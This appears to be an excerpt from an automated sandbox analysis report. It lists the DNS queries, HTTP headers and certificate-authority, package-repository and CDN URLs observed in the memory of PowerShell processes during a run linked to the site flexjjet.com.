        Source: global trafficDNS traffic detected: DNS query: beacons2.gvt2.com
        Source: global trafficDNS traffic detected: DNS query: pypi.org
        Source: global trafficDNS traffic detected: DNS query: files.pythonhosted.org
        Source: global trafficDNS traffic detected: DNS query: beacons3.gvt2.com
        Source: global trafficDNS traffic detected: DNS query: beacons4.gvt2.com
        Source: unknownHTTP traffic detected: POST /report/v4?s=bXQBxwAmZ7WxIqrZ0FChpzdGoPx9uxGr2HeEbWo7rCx9Tyd3CBrjKvdEM2F91EIFFH1y7ZhDPqWz%2Fy1UgqhsizgwRAV5xY25CZSY7Q%3D%3D HTTP/1.1host: a.nel.cloudflare.comcontent-length: 406content-type: application/reports+jsonorigin: https://flexjjet.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 09 Jun 2025 20:47:23 GMTcontent-type: text/htmlserver: cloudflarenel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}cache-control: max-age=14400cf-cache-status: EXPIREDvary: accept-encodingreport-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=bXQBxwAmZ7WxIqrZ0FChpzdGoPx9uxGr2HeEbWo7rCx9Tyd3CBrjKvdEM2F91EIFFH1y7ZhDPqWz%2Fy1UgqhsizgwRAV5xY25CZSY7Q%3D%3D"}]}cf-ray: 94d37bdbfc5166fb-DFWalt-svc: h3=":443"; ma=86400content-length: 548
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginxdate: Mon, 09 Jun 2025 20:47:44 GMTcontent-type: image/pngcontent-length: 1478etag: "67408724-5c6"strict-transport-security: max-age=31536000permissions-policy: interest-cohort=()x-frame-options: SAMEORIGINx-xss-protection: 1;mode=blockx-content-type-options: nosniffreferrer-policy: originexpect-ct: max-age=0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 09 Jun 2025 20:47:48 GMTcontent-type: text/htmlserver: cloudflarenel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}cache-control: max-age=14400cf-cache-status: EXPIREDvary: accept-encodingreport-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=87rhUTSMg8CR%2FafArohAn7%2Fa1TRwzN98YeixFhXGTd2Y4BXkheG2UI1wTungOZa%2Bd%2FOgKP%2BRGCDxUbotXeGHNghcsiO5sBKG%2B%2BEubQ%3D%3D"}]}cf-ray: 94d37c770d2b66fb-DFWalt-svc: h3=":443"; ma=86400content-length: 548
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C0BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bootstrap.pypa.io
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
        Source: powershell.exe, 00000013.00000002.1690428797.000001CE4E9E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso:
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D5B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C0BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dualstack.c.ssl.global.fastly.net
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D48A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dualstack.python.map.fastly.net
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hdl.handle.net/1895.22/1013
        Source: powershell.exe, 00000013.00000002.1689899872.000001CE468C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1689899872.000001CE46785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2446521559.0000025F3B6F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
        Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
